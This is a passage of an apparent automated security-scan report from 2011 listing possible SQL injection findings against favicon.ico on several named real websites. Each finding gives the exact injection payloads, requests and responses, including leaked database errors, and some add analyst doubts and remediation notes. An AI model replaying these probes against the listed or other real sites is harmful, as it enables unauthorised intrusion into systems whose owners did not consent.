
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
ETag: "13e-48bf77af67dc0"
Last-Modified: Thu, 22 Jul 2010 10:35:43 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... ................................Y........K.....................................................................................................................""""""""""""""""!...."."!.""!.."!...".""!.""!.."!...."."""""""""................................................................

1.14. http://www.infiniti.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.infiniti.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382271'%20or%201%3d1--%20 and 15382271'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico15382271'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 284
Expires: Tue, 03 May 2011 11:25:09 GMT
Date: Tue, 03 May 2011 11:25:09 GMT
Connection: close

<HTML><HEAD>
<TITLE>Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error - Read</H1>
The server encountered an internal error or misconfiguration and was unable to
complete your request.<P>
Reference&#32;&#35;3&#46;66ce8f18&#46;1304421909&#46;372a7dbb
</BODY></HTML>

Request 2

GET /favicon.ico15382271'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Win32) Communique/4.0.1 mod_jk/1.2.28
Content-Length: 1443
Content-Type: text/html;charset=UTF-8
Date: Tue, 03 May 2011 11:25:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="expires" content="never">
   <meta http-equiv="CACHE-CONTROL" content="PUBLIC">
   <meta name="Copyright" content="Infiniti Global">
   <meta name="Designer" content="Infiniti Global">
   <meta name="Publisher" content="Infiniti Global">
   <meta name="Revisit-After" content="15 days">
   <meta name="distribution" content="Local">
   <meta name="Robots" content="INDEX,FOLLOW">
   <meta name="MSSmartTagsPreventParsing" content="TRUE">
   <meta name="author" content="Infiniti Global">
   
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <title>Not Found</title>
   
   <script type="text/javascript" src="/static/scripts/s_code.js"></script>
   
   <link rel="stylesheet" type="text/css" href="/static/media/styles/reset.css">
   <link rel="stylesheet" type="text/css" href="/static/media/styles/site.css">
</head>
   <body class="noscript">
       <div id="flashcontent">
           <h1 id="header-logo">Infiniti</h1>
           <div id="wrapper">
               <h1>Not found</h1>
               <p>The page you have requested was not found.</p>
               <p>You may have clicked an expired link or mistyped the address.</p>
           </div>
       </div>
       <script type="text/script">
           s.pageType = 'errorPage';
           var s_code=s.t();
           if(s_code) document.write(s_code);
       </script>
   </body>
</html>

1.15. http://www.infiniti.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.infiniti.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19896265%20or%201%3d1--%20 and 19896265%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?119896265%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 284
Expires: Tue, 03 May 2011 11:25:03 GMT
Date: Tue, 03 May 2011 11:25:03 GMT
Connection: close

<HTML><HEAD>
<TITLE>Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error - Read</H1>
The server encountered an internal error or misconfiguration and was unable to
complete your request.<P>
Reference&#32;&#35;3&#46;66ce8f18&#46;1304421903&#46;372a797f
</BODY></HTML>

Request 2

GET /favicon.ico?119896265%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Win32) Communique/4.0.1 mod_jk/1.2.28
Last-Modified: Thu, 30 Jul 2009 21:49:47 GMT
ETag: "3cea-57e-484a594f"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Tue, 03 May 2011 11:25:04 GMT
Connection: close

...[SNIP]...

1.16. http://www.lvhn.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lvhn.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lvhn.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:14 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9c1a7a3fa55a51b4b0a14529df464a4b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 209
Vary: User-Agent

invalid query:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico'' and a.template_id = b.template_id' at line 1

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lvhn.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:14 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=eeb38462e2017f6127c166bb113704f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Vary: User-Agent
Content-Length: 37376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Comp
...[SNIP]...

1.17. http://www.mailfromftd.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mailfromftd.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21410475'%20or%201%3d1--%20 and 21410475'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the two responses were produced by different tiers: the 1=1 request was answered with a 503 by the Varnish cache in front of the site (Server: Varnish, a Guru Meditation page), while the 1=2 request reached Apache and was redirected to an error page. Neither body contains database output, so the difference is more plausibly explained by the cache and backend path than by a query, and this finding should be treated as unconfirmed.

Request 1

GET /favicon.ico21410475'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Tue, 03 May 2011 11:28:52 GMT
X-Varnish: 437988272
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 437988272</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /favicon.ico21410475'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=8619F46E75781075002383DB220F9615; Path=/; Domain=.mailfromftd.com
Set-Cookie: TLTUID=8619F46E75781075002383DB220F9615; Path=/; Domain=.mailfromftd.com; expires=Tue, 03-05-2021 11:28:52 GMT
Location: http://www.ftd.com/error.epl
Content-Type: text/html; charset=iso-8859-1
Content-Length: 347
Date: Tue, 03 May 2011 11:28:52 GMT
X-Varnish: 628702974
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/error.epl">here</A>.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
</BODY></HTML>

1.18. http://www.nativeoutdoors.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nativeoutdoors.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 96460785'%20or%201%3d1--%20 and 96460785'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the 1=1 request drew a 403 from Apache whose body echoes the path verbatim, and the 1=2 request drew the site's ordinary 404 page. A 403 that appears only when the request contains the literal string "or 1=1" is the behaviour of a request filter matching that well-known pattern before any application code runs, and no database output appears in either response. Confirm manually with a payload that avoids that string before treating this as an injection point.

Request 1

GET /favicon.ico96460785'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:18:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico96460785' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.nativeoutdoors.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico96460785'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:18:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3656

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Native Outdoors Page Not Found</title>
<meta name="Microsoft Border" content="t, default">
</head>

<body><!--msnavigation--><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td>

<p align="center"><map name="FPMap0_I1">
<area href="http://www.nativeoutdoors.com/php/giveaway.php" shape="rect" coords="385, 2, 541, 27">
<area href="http://www.nativeoutdoors.com/contact.html" shape="rect" coords="546, 1, 680, 29">
<area href="http://order.store.yahoo.net/cgi-bin/wg-order?nativeoutdoors" shape="rect" coords="694, 0, 799, 30">
<area href="http://www.nativeoutdoors.com/index.html" shape="rect" coords="9, 0, 279, 117">
<area href="http://www.nativeoutdoors.com/index.html" shape="rect" coords="315, 2, 376, 26">
</map><img border="0" src="images/index/main/header.jpg" usemap="#FPMap0_I1" align="left" hspace="1" width="800" height="125"></p>

</td></tr><!--msnavigation--></table><!--msnavigation--><table dir="ltr" border="0" cellpadding="0" cellspacing="0" width="100%"><tr><!--msnavigation--><td valign="top">

<p align="center"><map name="FPMap0_I1">
<area href="http://www.nativeoutdoors.com/scoutingcameras.html" shape="rect" coords="0, 119, 100, 149">
<area href="http://www.nativeoutdoors.com/deerfeeders.html" shape="rect" coords="99, 119, 213, 149">
<area href="http://www.nativeoutdoors.com/aerialassault.html" shape="rect" coords="214, 120, 317, 149">
<area href="http://www.nativeoutdoors.com/archery/index.html" shape="rect" coords="316, 120, 402, 149">
<area href="http://www.nativeoutdoors.com/guncases.html" shape="rect" coords="402, 119, 488, 149">

...[SNIP]...

1.19. http://www.nativeoutdoors.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nativeoutdoors.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16573550%20or%201%3d1--%20 and 16573550%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the 1=1 parameter name drew a 403, while the 1=2 request was answered with the static icon file itself (Content-Type: image/x-icon, with Last-Modified and ETag headers), that is, served by Apache straight from disk with no application code involved. As with 1.18, a 403 only on the request containing "or 1=1" points at a request filter rather than at a query.

Request 1

GET /favicon.ico?116573550%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:18:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 518
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.nativeoutdoors.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico?116573550%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 09 Feb 2010 21:19:07 GMT
ETag: "1e6a094-cbe-47f3177cea8c0"
Accept-Ranges: bytes
Content-Length: 3262
Content-Type: image/x-icon

...[SNIP]...

1.20. http://www.needlepointers.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.needlepointers.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The visible fragment of the response is an error raised by the ODBC Driver Manager in classic ASP rather than a syntax error from the database engine, and the truncated text does not show the injected value. Errors at that layer can occur independently of the input, so the same request without the quote, and with two quotes, should be compared before this is treated as confirmed.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error message removes only the information leak; the injection itself is fixed by passing the path segment to the query as a bound parameter of a prepared statement rather than concatenating it into the SQL string.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.needlepointers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 10:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 354
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADSDDTD=FJIJEFODIEFFIKFFFFMCFJCF; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80004005'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Driver Manager] Data s
...[SNIP]...

1.21. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.osbornewood.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The error text shows the value that reached the query: the request path with ".cfm" appended, where the injected quote terminates the string literal early. The server returns this SQL syntax error with a 404 status, so a review that only examines 200 responses would miss it; repeating the request with two quotes should make the error disappear if the quote is the cause.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error message removes only the information leak; the injection itself is fixed by passing the path segment to the query as a bound parameter of a prepared statement rather than concatenating it into the SQL string.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osbornewood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:51 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e29d3bebf89e00eb1536ce53fb29ce04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 151
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.cfm'' at line 1

1.22. http://www.payentry.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.payentry.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The error in Response 1 ("Unclosed quotation mark", "Incorrect syntax near 'web'") shows the quote terminating a string literal in the query that reads the list of application servers, a query that evidently runs for every request before routing: with the quote doubled, the same request is routed normally with a 302 to www5.payentry.com. The failure is again reported with a 200 status.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the error message removes only the information leak; the injection itself is fixed by passing the path segment to the query as a bound parameter of a prepared statement rather than concatenating it into the SQL string.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payentry.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:44 GMT
Connection: close

<html>
<head>
<title>Error</title>
</head>
<body>
<h1>Error</h1>
<p>The following error has occured while processing this request:</p>
<pre style="background-color: #e0e0e0;">Can't read list of app servers: Incorrect syntax near 'web'.
Unclosed quotation mark after the character string ''.
Statement(s) could not be prepared.
</pre>
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payentry.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Object Moved
Content-Length: 161
Content-Type: text/html
Location: http://www5.payentry.com/favicon.ico''
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:44 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www5.payentry.com/favicon.ico''">here</a></body>

1.23. http://www.state.de.us/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.state.de.us
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 42840175'%20or%201%3d1--%20 and 42840175'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here both responses are plain Apache error pages (403 for the 1=1 variant, 404 for 1=2) with no database output, and the payload was simply appended to the curl User-Agent string. The pattern matches a request filter rejecting the literal "or 1=1" rather than a query built from the header; confirm manually with a payload that avoids that string.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.342840175'%20or%201%3d1--%20
Host: www.state.de.us
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:25:02 GMT
Server: Apache/2.2.3 (Oracle)
Content-Length: 293
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<hr>
<address>Apache/2.2.3 (Oracle) Server at www.state.de.us Port 80</address>
</body></html>

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.342840175'%20or%201%3d2--%20
Host: www.state.de.us
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:25:02 GMT
Server: Apache/2.2.3 (Oracle)
Content-Length: 289
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<address>Apache/2.2.3 (Oracle) Server at www.state.de.us Port 80</address>
</body></html>

1.24. http://www.straight.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.straight.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14199974'%20or%201%3d1--%20 and 14199974'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here both responses are the same Drupal 404 page; the visible differences are a per-request CTools page id and the ad-targeting section attribute ("Arts" versus "homepage"), and neither response contains database error output. That is weak evidence, and the finding should be treated as unconfirmed until reviewed by hand.

Request 1

GET /favicon.ico14199974'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417875"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<!--
jQuery.extend(Drupal.settings, {"basePath":"\/","CTools":{"pageId":"page-7dcb086346dee91c75c038bf98df80eb"},"thickbox":{"close":"Close","next":"Next \u003e","prev":"\u003c Prev","esc_key":"or Esc Key","next_close":"Next \/ Close on last","image_count":"Image !current of !total"},"extlink":{"extTarget":"_blank","extClass":"ext","extSubdomains":1,"extExclude":"(livenation\\.com\\\/edp)|(static\\.ak\\.fbcdn.net\\\/connect\\.php)|(www\\.addthis\\.com\\\/bookmark\\.php)","extInclude":"","extAlert":0,"extAlertText":"This link will take you to an external web site. We are not responsible for their content.","mailtoClass":"mailto"}});
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
overMenuDefault = 'dynamic-persistent-menu-menu';
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
subMenuTimeout = 3600000;
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
document.write(unescape("%3Cscript src='http://partner.googleadservices.com/gampad/google_service.js' type='text/javascript'%3E%3C/script%3E"));

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GS_googleAddAdSenseService("ca-pub-1107966834184205");
GS_googleEnableAllServices();

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleAddSlot("ca-pub-1107966834184205", "CouponsVertical");
GA_googleAddSlot("ca-pub-1107966834184205", "Banner");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard_Bottom");

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleFetchAds();

//--><!]]>
</script>

<script language="javascript" type="text/javascript" src="/js/article_specific.js.min"></script>

<script language="javascript" type="text/javascript" src="/js/global.js.min.js"></script>

<script language="JavaScript">GA_googleAddAttr("section", "Arts");</script>
<script language="JavaScript">GA_googleAddAttr("section", "arts");</script>
<script language="
...[SNIP]...

Request 2

GET /favicon.ico14199974'%20or%201%3d2--%20 HTTP/1.1
